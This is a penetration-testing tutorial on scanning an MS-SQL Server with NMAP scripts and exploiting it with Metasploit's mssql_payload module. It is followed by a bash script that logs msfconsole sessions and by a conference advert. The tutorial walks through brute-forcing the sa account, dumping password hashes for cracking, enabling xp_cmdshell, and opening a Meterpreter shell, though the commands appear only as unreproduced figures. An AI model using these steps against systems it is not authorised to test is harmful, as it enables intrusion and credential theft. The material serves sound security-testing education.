Both tools can help you find flaws that are present in your systems before the bad guys do.
In this article we will learn how to use NMAP and Metasploit to scan and exploit an MS-SQL
Server; as a bonus we will see how easy it is to set up an automated log to record your
findings, so your reporting duties are a lot easier.
Databases are a necessity in this day and age of technology. A database is a collection of information
organized in a way that allows the user to select any type of data quickly with queries. This data
includes usernames, passwords, emails, phone numbers, addresses, credit card info, purchase records,
inventory, etc. Many of these databases are exposed to the public via a web app that allows the user to
interact with it by using a form or a search box. If you set up a database the wrong way you can expose your
company to all sorts of vulnerabilities, like XSS or SQLi. Also, by leaving the defaults, almost anyone with
a fair knowledge of the tools can scan you and get info about the server, login information, tables, etc. Here we
are assuming that you are testing your own servers, so we will not be talking about anonymity or anything
like that. This is an engagement where you are testing systems from your place of work, so reporting should
be a priority here. This article assumes that you are using Backtrack 5R3.
Figure 1. NMAP scripts to analyze MS-SQL Servers
NMAP
NMAP is a security scanner written by Gordon Lyon and it's mainly used to discover hosts and services on a
computer network, thus creating a map of the network. NMAP has lots of features that allow you to see
networks, such as host discovery, service and operating system detection, etc. One of the coolest features, and
the one we will use today, is the NSE or NMAP Scripting Engine. These scripts can perform more advanced
service detection, vulnerability analysis, and even brute forcing. For now we will focus on just the scripts to
analyze MS-SQL. To see a full list of the scripts that are related to MS-SQL, go to your terminal and type
cd /opt/metasploit/common/share/nmap/scripts (Figure 1). These are the scripts that we have available, and they
can be used with multiple arguments to augment their power, as we will see later on. The first thing we'll do
is scan our network for MS-SQL servers (Figure 2).
Figure 2. NMAP found an example of MS-SQL running on our network
After we've found an instance of MS-SQL, the next thing we should do is try to get more info from the machine,
so we run the ms-sql-info script (Figure 3).
Figure 3. NMAP finds that our server has not been patched
The next thing is to find if any account has an empty password (Figure 4).
Figure 4. As you can see the script gives us no results
We can conclude that the server does not have a user with an empty password. At this point the next step will
be to attempt a brute force attack on the server. Of course, if password lockout policies are in effect, you will
end up locking everyone out. Try to perform these tests on a non-working day so you can later
unblock the accounts for the users. Also, this test will help you monitor how well your IDS/IPS system is
working, as these types of attacks are extremely noisy (Figure 5).
Figure 5. NMAP brute force attack
It's really nice to know that with NMAP you can add additional arguments in order to use the brute force
script with your own user or password list. This way you don't need to rely on the default lists. This shows
you how powerful NMAP really is. So far we've discovered an MS-SQL instance running on a server that
is not fully patched and whose login information is user sa (the default MS-SQL admin user) with password1
as its password. If you know SQL, all you have to do now is log in to the server and do whatever you
want. However, instead of doing that, we will continue testing our NMAP scripts. Let's try to find some
configuration information (Figure 6).
Figure 6. NMAP Configuration script results
The thing to notice here is xp_cmdshell. NMAP has a script to pass commands through this option, but
only if it's open or activated. The results show that it's closed, so this won't work with NMAP but then again,
there's Metasploit! Another script that will produce results is this (Figure 7).
Figure 7. NMAP provides us with the table info on our MS-SQL server
Let's look at the last two scripts we will test (Figure 8). Here you can see that you are able to pull the
database name and the username of the creator. This is a good way to see other usernames so you can get a
better idea of how many people access this MS-SQL instance. The last script allows you to pull the hashes
of the available users. Once you have these you don't need to attack the server directly; you can move on to an
offline attack with tools like John the Ripper and try to crack the hashes to get more credentials.
Figure 8. NMAP script to obtain database owner info and user hashes
We have covered essentially what your possibilities are with NMAP against any MS-SQL server. As you can
see, there is a lot of info that can be gathered, especially if you are able to find a valid credential to access the
MS-SQL instance. If you refer back to Figure 3 you will notice that once this MS-SQL Server software was
installed, it never received additional patching. This opens the door to a lot of possible vulnerabilities, and it's
our cue to move on to Metasploit.
Metasploit
Metasploit is a framework that provides the infrastructure needed to automate the multiple tasks needed in order
to assess and/or exploit vulnerabilities found in a host. It provides multiple tools that allow you to scan almost
any host and check for security holes that can later be exploited by using one or many of its catalog of exploits.
Still, beware: this is not a magical point-and-click tool. Just because you may find misconfigured things via the
scanner modules doesn't mean that there is an exploit guaranteed to work. Sometimes you need to modify the
actual exploit code, and sometimes they just won't work.
Metasploit was developed by HD Moore to have a flexible and maintainable framework for the
creation and development of exploits, saving him the time of validating and sanitizing public
exploit code. His first iteration had 11 exploits. Now you can find well over a thousand exploits, as well as
auxiliary modules and NOPs. Today, Metasploit is a necessary tool for penetration testing and exploitation.
To get Metasploit running you can follow the path stated on the next figure (Figure 9).
Figure 9. Accessing Metasploit
Wait for the console to load and when you get a cool banner followed by the msf> prompt you are ready to work.
Figure 10. Metasploit scanners for MS-SQL
Using metasploit to test MS-SQL
The first thing you should do when testing a host with Metasploit is to gather some information. Metasploit
provides many scanners for these purposes. As we can see here, a quick search produces the following results
(Figure 10). There's another interesting folder called admin, but it's left for you to explore its options and try
them. When we analyze the results we see modules that let us get info very similar to what NMAP got us
earlier. As an example, let's see what the mssql_ping scanner shows (Figure 11).
Figure 11. A login scanner module results
Check the commands in the previous figure to understand how to see the available options, load the required values
and run the module. I included the password because we got it with NMAP, but as you can see it's not a
required value. Once you run the module you get a result very similar to the NMAP ms-sql-info script.
This shows that NMAP is a really amazing tool that can get interesting info out of a host, not just open ports.
Based on this we don't need to use the other scanners because we already got that info. So the next step is to
explore possible exploits (Figure 12). You can try them all, but if you load mssql_payload and read its info
you will find something really interesting (Figure 13).
Figure 12. Possible MS-SQL exploits
Figure 13. mssql_payload Exploit info
Remember earlier that we found the xp_cmdshell service on our MS-SQL server with NMAP? It was off, but
this exploit will try to activate it before passing the payload, so it's worth a try (Figure 14).
Figure 14. Setting the options for our exploit
Now what we need to do is set a payload. A payload is a piece of code that we want to execute right after
our exploit runs successfully against our target. It allows us to do a task such as add a user, open a command
prompt in Windows or a terminal in Linux so we can explore the machine, etc. There is a special payload called
Meterpreter that is considered the mother of all payloads because it allows so much flexibility once executed.
It also contains auxiliary modules that let you run tasks inside the machine like getting hashes, taking screenshots,
starting a keylogger, creating interactive shells, planting backdoors, uploading and executing software on the target, etc.
Good for us that we have the option to use Meterpreter here, because not all exploits support it as a payload (Figure 15).
Figure 15. Setting Meterpreter as our payload
We are using a bind type of payload; if there are firewall rules that block outside hosts' connection attempts
going into other machines than those established by the rules, this won't work, so you may want to try using a
reverse type of connection so the victim connects to you. If the firewall also filters connection attempts from
internal PCs to unknown hosts, then you are out of luck. Now we are all set up, so we verify our options once
again and type exploit to start the exploitation attempt (Figure 16).
Figure 16. Verifying our options and sending the exploit
Here you can see our exploit trying to start the xp_cmdshell service (Figure 17).
Figure 17. xp_cmdshell service
Once the whole process is finished, if it was successful, the payload will be delivered and we will see a
Meterpreter shell opened (Figure 18).
Figure 18. The meterpreter shell
Now you can type help to explore all options. As an example, we can type the command shell and explore
(Figure 19).
Figure 19. shell command
As you can see, once inside the command prompt you can explore anything you want and check that you are
inside the right machine by checking its IP address. From here your task is to explore other Meterpreter commands.
At this point we are done with our task, as we successfully scanned and exploited the MS-SQL service installed.
Now let's move on.
Bonus: Setting Up An Automated Reporting Script
When you do any type of engagement it is really important that you make sure you are logging every step
of your process so later you can document it for your boss. The problem is that you don't want to be writing
down everything. Here's where a little bash comes to the rescue. The following script will allow you to
create a folder for your job and save your log inside it with a name based on the date of the engagement. If you
can't finish it in one day or have to stop, no problem: the script allows you to create another log and save it
in the same folder without overwriting previous logs. The nice thing is that once the log is created the script
calls Metasploit, loads it, and tells it to save all input to the log you just created! Here's the script (please use
it without changing the authors' names). Copy the script and save it as startMSFCONSOLE.sh, then run chmod 744
startMSFCONSOLE.sh to make it executable. To use it, type ./startMSFCONSOLE.sh (Listings 1-3).
Listing 1. The script, option 1
#!/bin/bash
# This script creates a timestamp and then sets it as the name for our Metasploit activity log, then
# calls Metasploit and invokes the log to start collecting info. It offers the option of creating a new
# project folder to save your logs or of selecting an existing project folder to continue saving
# information. The script was created during a Metasploit workshop with Carlos Perez, where he
# suggested the Timestamp Output / Spool as a better alternative to keep logs from projects...
# Pedro Ortiz / José Ruiz - May 2013
clear
echo
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "TIMESTAMP OUTPUT / SPOOL - REPORT LOG AUTOMATION SCRIPT"
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo
echo "Select Your Option"
echo
echo "--------------------------"
echo "1 - New Project Report"
echo "2 - Continue Previous Project"
echo "3 - Exit Script"
echo
read -p ">>> " option
echo
# OPTION 1 - Create a new folder for a new project engagement...
if [ "$option" = 1 ]; then
    read -p "New Project Folder: " folder
    mkdir -p "/root/$folder"               # create it under /root, where the cd below expects it
    cd "/root/$folder" || exit 1
    echo
    d=$(date +%Y_%m_%d_%H_%M)              # timestamp used as the log name
    echo "Your log: $d"
    echo
    echo "Loading msfconsole... Please Wait..."
    # Write the resource file: timestamp every line of output, then spool it all to the log
    echo "set TimestampOutput true" > "/root/$folder/autolog.rc"
    echo "spool /root/$folder/$d.txt" >> "/root/$folder/autolog.rc"
    msfconsole -r autolog.rc
fi
Listing 2. The script, option 2
# OPTION 2 - Create a new log inside an existing folder to continue a previous engagement...
if [ "$option" = 2 ]; then
    read -p "Existing Project Folder: " folder
    cd "/root/$folder" || exit 1
    echo
    d=$(date +%Y_%m_%d_%H_%M)              # a new timestamp, so earlier logs are not overwritten
    echo "Your log: $d"
    echo
    echo "Loading msfconsole... Please Wait..."
    echo "set TimestampOutput true" > "/root/$folder/autolog.rc"
    echo "spool /root/$folder/$d.txt" >> "/root/$folder/autolog.rc"
    msfconsole -r autolog.rc
fi
Listing 3. The script, option 3
# OPTION 3 - Exit
if [ "$option" = 3 ]; then
    echo
    echo "Closing Script..."
    echo
    sleep 2
    clear
    exit
fi
# ERROR CORRECTION - anything other than 1, 2 or 3 returns to the menu
# (a bare -gt 3 test would miss letters, 0 and empty input, and errors on non-numbers)
if [ "$option" != 1 ] && [ "$option" != 2 ] && [ "$option" != 3 ]; then
    echo
    echo "Invalid Selection... Returning to Main Menu... Please wait..."
    echo
    sleep 2
    exec "$0"                              # restart startMSFCONSOLE.sh from the top
fi
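As an added example that is not part of the article's script: a non-interactive POSIX shell helper that writes the same autolog.rc (set TimestampOutput true, then spool to the log) as startMSFCONSOLE.sh, but checks the project name before it reaches mkdir and cd, keeps projects under a base directory you pass in rather than a hard-coded /root, and gives a second start within the same minute its own log file instead of reusing the earlier one. The function name prepare_msf_log, its BASE_DIR argument and the optional TIMESTAMP argument are my own choices.

```shell
#!/bin/sh
# Added example (not the article's script): builds the project folder and the
# autolog.rc resource file that startMSFCONSOLE.sh writes, with input checks.
# Prints the path of the resource file so it can be handed to msfconsole -r.
#
# Usage: prepare_msf_log BASE_DIR PROJECT [TIMESTAMP]
#   TIMESTAMP defaults to date +%Y_%m_%d_%H_%M (the article's log-name format);
#   it is a parameter only so the behaviour can be exercised deterministically.
prepare_msf_log() {
    base="$1"
    project="$2"
    stamp="${3:-$(date +%Y_%m_%d_%H_%M)}"

    # Allow only letters, digits, '_' and '-': an answer such as ../etc would
    # otherwise be passed straight to mkdir and cd, and would break the rc file.
    case "$project" in
        ''|*[!A-Za-z0-9_-]*)
            echo "invalid project name: '$project'" >&2
            return 1 ;;
    esac

    dir="$base/$project"
    mkdir -p "$dir" || return 1

    # Choose a log name that does not exist yet: <stamp>.txt, then <stamp>_1.txt,
    # <stamp>_2.txt ... so a restart in the same minute gets its own file.
    log="$dir/$stamp.txt"
    n=0
    while [ -e "$log" ]; do
        n=$((n + 1))
        log="$dir/${stamp}_$n.txt"
    done
    : > "$log"    # create it now so the name is taken before msfconsole starts

    # The same two msfconsole commands the article's script writes.
    rc="$dir/autolog.rc"
    {
        echo "set TimestampOutput true"
        echo "spool $log"
    } > "$rc"
    echo "$rc"
}

# Typical call (hypothetical paths); the launch is what the article does next:
#   msfconsole -r "$(prepare_msf_log "$HOME/engagements" hakin9)"
```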
Okay, so once you get your script operational, let's see what it does (Figures 20-22).
Figure 20. Calling the script to create your log
Figure 21. Creating a new project folder
Figure 22. Metasploit loaded
Notice the last lines, where it tells you that your log information is being saved in the folder you just created.
Once you get here you are ready to work.
If we run an NMAP scan from within Metasploit, you can save it to your log. Let's see (Figure 23).
Figure 23. Calling NMAP from within Metasploit
Now let's check our newly created log to see if it's doing what it is supposed to do (Figures 24, 25 and 26).
Figure 24. Our Hackin9 folder
Figure 25. Our log
As you can see here, every step of the process gets recorded for easy reference later when you are writing
your report.
Figure 26. Part of our collected info
Conclusion
We have explored the possibilities that NMAP has to offer to scan and analyze MS-SQL servers.
The scripting engine is a powerful tool that can help you explore lots of different things. Go ahead and experiment
with the additional possibilities. To do this, set up different services or apps like IIS, web sites, Oracle etc. and scan
those using the scripts provided to work with them. Also we were able to see the possibilities that Metasploit has
to offer and leave you with the task of comparing them to NMAP to see which works better and why. Finally, the
bonus script will help you collect the info and save it for reporting so your homework now is to repeat this tutorial
but creating the folder and log first. Also take notice of how NMAP behaves inside Metasploit. Enjoy!
About the Author
Jose Ruiz is an independent consultant specializing in the areas of physical and logical
network security, with tasks ranging from policy audit, vulnerability assessment,
mitigation plan implementation, business continuity and others. He
works investigating various cases ranging from corporate misuse of resources to
phishing and wireless intrusion. Jose is also an IT instructor and Microsoft Certified
Trainer teaching courses for both Microsoft and CompTIA certifications, and a college
professor at undergraduate and graduate level teaching forensics, networking, wireless
and ethical hacking courses at both EDP University and Interamerican University in
Puerto Rico. Jose is also an active contributor to the ISECOM Hackers High School
project. He holds a Master's Degree in Information Systems with a specialty in electronic fraud
investigation and multiple certifications including A+, Network+, Server+, Security+, MCSA 2000 /
2003 / 2008, MCITP, MCT, OSWP, CIW and others.
Securing Assets Across Europe
14th & 15th October 2014
MCE, Brussels, Belgium
www.isse.eu.com
ISSE 2014
Europe's leading independent, interdisciplinary
security conference and exhibition
Over the past decade, Information Security Solutions Europe (ISSE) has
built an unrivalled reputation for its world-class, interdisciplinary approach
and independent perspective on the e-security market.
This year, ISSE will take place on 14th & 15th October in Brussels.
Regularly attracting over 300 professionals including government,
commercial end-users and industry experts who will come together for
a unique all-encompassing opportunity to learn, share and discuss the
latest developments in e-security and identity management.
Programme Topic Areas
Trust Services, eID and Cloud Security
European trust services and eIdentity regulation, governance rules,
standardization, interoperability of services and applications, architectures
in the cloud, governance, risks, migration issues
BYOD and Mobile Security
Processes and technologies for managing BYOD programs,
smartphone/tablet security, mobile malware, application threats
Cybersecurity, Cybercrime, Critical Infrastructures
Attacks & countermeasures against industrial Infrastructures; CERT/CSIRT
European & global developments, resilience of networks & services,
surveillance techniques & analytics
Security Management, CISO Inside
CISOs featuring the latest trends and issues in information security, risk
mitigation, compliance & governance; policy, planning and emerging areas
of enterprise security architecture
Privacy, Data Protection, Human Factors
Issues in big data & cloud, privacy enhancing technologies, insider threats,
social networking/engineering and security awareness programs
Regulation & Policies
Governmental cybersecurity strategies, authentication, authorization &
accounting, governance, risk & compliance
For more information visit www.isse.eu.com
In partnership with
@ISSEConference